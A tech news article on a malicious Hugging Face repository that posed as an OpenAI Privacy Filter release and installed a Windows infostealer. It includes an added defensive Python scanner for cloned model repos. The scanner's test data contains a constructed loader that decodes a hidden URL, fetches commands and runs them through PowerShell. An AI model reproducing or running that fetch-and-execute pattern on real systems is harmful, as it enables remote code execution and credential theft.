
Hugging Face hosted malicious software masquerading as OpenAI release

A malicious Hugging Face repository that posed as an OpenAI release delivered infostealer malware to Windows machines and recorded about 244,000 downloads before being removed, according to research from AI security firm HiddenLayer. The download count may have been artificially inflated by the attackers to make the model appear more popular, so the true extent of the attack's impact is unknown.

‘Open-OSS/privacy-filter’ imitated OpenAI’s Privacy Filter release. HiddenLayer said the original model card had been copied almost exactly, and the bad actors included a malicious loader.py file that fetched and ran credential-stealing malware on Windows hosts.

The repo reached the top of the ‘trending’ list on Hugging Face with 667 likes accrued in less than 18 hours – again, this figure may have been manipulated by the attackers.

Public AI model registries may be becoming a risk in the software supply chain as developers and data scientists clone models directly into corporate environments, environments that have access to source code, cloud credentials, and internal systems. That situation alone makes a compromised model repository more than a nuisance.

The README file for the fake model closely resembled that of the official project, but it departed from the original in that it instructed users to run start.bat on Windows or execute python loader.py on Linux and macOS, instructions central to the infection chain HiddenLayer described.

Researchers have previously warned that malicious code can be hidden inside AI model files or associated setup scripts on Hugging Face and other public registries. Previous cases involved Pickle-serialised model files that bypassed platform scanners.

Malicious loader disguised as setup code

HiddenLayer said loader.py began with decoy code that resembled a normal AI model loader, moving quickly to a concealed infection chain. The script disabled SSL verification, decoded a base64-encoded URL pointing to jsonkeeper.com, retrieved a remote payload instruction, and handed commands to PowerShell on Windows machines. HiddenLayer said using jsonkeeper.com as the command-and-control channel allowed the attacker to rotate the payload without altering the repo’s contents.

The PowerShell command then downloaded a further batch file from an attacker-controlled domain, and the malware established persistence by creating a scheduled task designed to resemble a legitimate Microsoft Edge update process.

The final payload was a Rust-based infostealer. According to HiddenLayer, it targeted Chromium- and Firefox-derived browsers, Discord local storage, cryptocurrency wallets, FileZilla configurations, and host system information. The malware also attempted to disable the Windows Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW).

Wider campaigns

HiddenLayer also said it found six further Hugging Face repositories containing nearly identical loader logic that shared infrastructure with the attack described above.

The case follows other warnings about malicious AI models on Hugging Face, including poisoned AI SDKs and fake OpenClaw installers. The common thread is that attackers are treating AI development workflows as a route into otherwise secure environments. AI repositories often contain executable code, setup instructions, dependency files, notebooks, and scripts, and it is these peripheral components that cause the problems, rather than the models themselves.

Sakshi Grover, senior research manager for cybersecurity services at IDC, said traditional SCA was designed to inspect dependency manifests, libraries, and container images. It is less effective at identifying malicious loader logic in AI repositories. Grover also cited IDC’s November 2025 FutureScape report, which contained the prediction that by 2027, 60% of agentic AI systems should have a bill of materials. This would help companies track which AI artefacts they use, their source, which versions were approved, and whether they contain executable components.
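The loader traits HiddenLayer describes above (SSL verification switched off, a base64-encoded URL, commands handed to PowerShell) and the gap Grover points to in conventional SCA both argue for checking a cloned repository before anything in it is run. The script below is an added example, not HiddenLayer's, IDC's or Hugging Face's tooling: it inventories the executable artefacts in a cloned repo, which is the raw material for the bill of materials Grover describes, and statically flags those three traits in every Python file using the standard library's `ast` parser. The sample repository contents, the function names, and the host example.invalid are constructed for the example.

```python
# Static triage of a cloned model repository before anything in it is run.
# Added example (not HiddenLayer's or Hugging Face's tooling): inventories
# executable artefacts and parses each Python file with `ast` to flag the
# loader traits described in the article. Sample files and the host
# example.invalid are constructed placeholders.
import ast, base64, binascii, os, re, tempfile

EXECUTABLE_EXT = {".py", ".bat", ".cmd", ".ps1", ".sh", ".ipynb"}
SHELL_CALLS = {"subprocess.run", "subprocess.Popen", "subprocess.call",
               "subprocess.check_output", "os.system", "os.popen"}
SHELL_HINTS = ("powershell", "pwsh", "cmd.exe")
URL_RE = re.compile(r"^https?://", re.I)


def _dotted(node):
    """Render a Name/Attribute chain such as subprocess.run as a string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    return ".".join(reversed(parts + [node.id])) if isinstance(node, ast.Name) else ""


def scan_python_source(src, name="<src>"):
    """Return sorted (rule, line) findings for one Python source text."""
    findings = set()
    try:
        tree = ast.parse(src, filename=name)
    except SyntaxError as exc:
        return [("unparseable", exc.lineno or 0)]
    for node in ast.walk(tree):
        # Rule 1a: ssl._create_unverified_context installs a no-check TLS context
        if isinstance(node, ast.Attribute) and node.attr == "_create_unverified_context":
            findings.add(("tls_verify_disabled", node.lineno))
        if not isinstance(node, ast.Call):
            continue
        callee = _dotted(node.func)
        # Rule 1b: verify=False on an HTTP client call
        if any(k.arg == "verify" and isinstance(k.value, ast.Constant)
               and k.value.value is False for k in node.keywords):
            findings.add(("tls_verify_disabled", node.lineno))
        # Rule 2: a base64 literal whose plaintext is a URL (a hidden C2 address)
        if callee.endswith("b64decode") and node.args:
            arg = node.args[0]
            if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
                try:
                    decoded = base64.b64decode(arg.value, validate=True).decode()
                except (binascii.Error, UnicodeDecodeError, ValueError):
                    decoded = ""
                if URL_RE.match(decoded):
                    findings.add(("base64_url", node.lineno))
        # Rule 3: a shell-spawning call whose string literals name PowerShell/cmd
        if callee in SHELL_CALLS:
            literals = [c.value.lower() for c in ast.walk(node)
                        if isinstance(c, ast.Constant) and isinstance(c.value, str)]
            if any(h in lit for lit in literals for h in SHELL_HINTS):
                findings.add(("shell_handoff", node.lineno))
    return sorted(findings, key=lambda f: (f[1], f[0]))


def inventory_repo(root):
    """List executable artefacts under root and scan each Python file in it."""
    report = {"executables": [], "findings": {}}
    for dirpath, _, files in os.walk(root):
        for fn in sorted(files):
            path = os.path.join(dirpath, fn)
            rel = os.path.relpath(path, root)
            ext = os.path.splitext(fn)[1].lower()
            if ext in EXECUTABLE_EXT:
                report["executables"].append(rel)
            if ext == ".py":
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_python_source(fh.read(), rel)
                if hits:
                    report["findings"][rel] = hits
    return report


# Constructed sample: a decoy loader followed by the traits the article lists.
SAMPLE_LOADER = '''\
import base64, ssl, subprocess
import requests

def load_model(path):  # decoy: looks like an ordinary model loader
    return open(path, "rb").read()

ssl._create_default_https_context = ssl._create_unverified_context
url = base64.b64decode("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvdGFzaw==").decode()
instr = requests.get(url, verify=False).text
subprocess.run(["powershell", "-NoProfile", "-Command", instr])
'''


def build_sample_repo():
    """Write a constructed repo layout to a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="model-repo-")
    files = {"README.md": "Run start.bat (Windows) or python loader.py.\n", "config.json": "{}\n",
             "model.safetensors": "", "loader.py": SAMPLE_LOADER, "start.bat": "python loader.py\r\n"}
    for name, body in files.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root
```

Calling `inventory_repo(build_sample_repo())` lists `loader.py` and `start.bat` as executable artefacts and reports four findings in `loader.py`, one per flagged line; pointing `inventory_repo` at a real clone runs the same triage without executing anything from it. These rules are heuristics for the exact pattern described above: a loader that assembles its URL or command at runtime rather than from a literal will slip past them, so they complement, rather than replace, running untrusted setup code only inside an isolated sandbox.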

Response and mitigation

HiddenLayer advised anyone who cloned Open-OSS/privacy-filter and ran start.bat, python loader.py or any file from the repository on a Windows host to treat the system as compromised, and recommends re-imaging affected systems. Browser sessions should be considered compromised even when passwords are not held locally, as session cookies let attackers bypass MFA in some circumstances.

Hugging Face has confirmed the repo has been removed.

(Image source: Pixabay, under licence.)


The post Hugging Face hosted malicious software masquerading as OpenAI release appeared first on AI News.
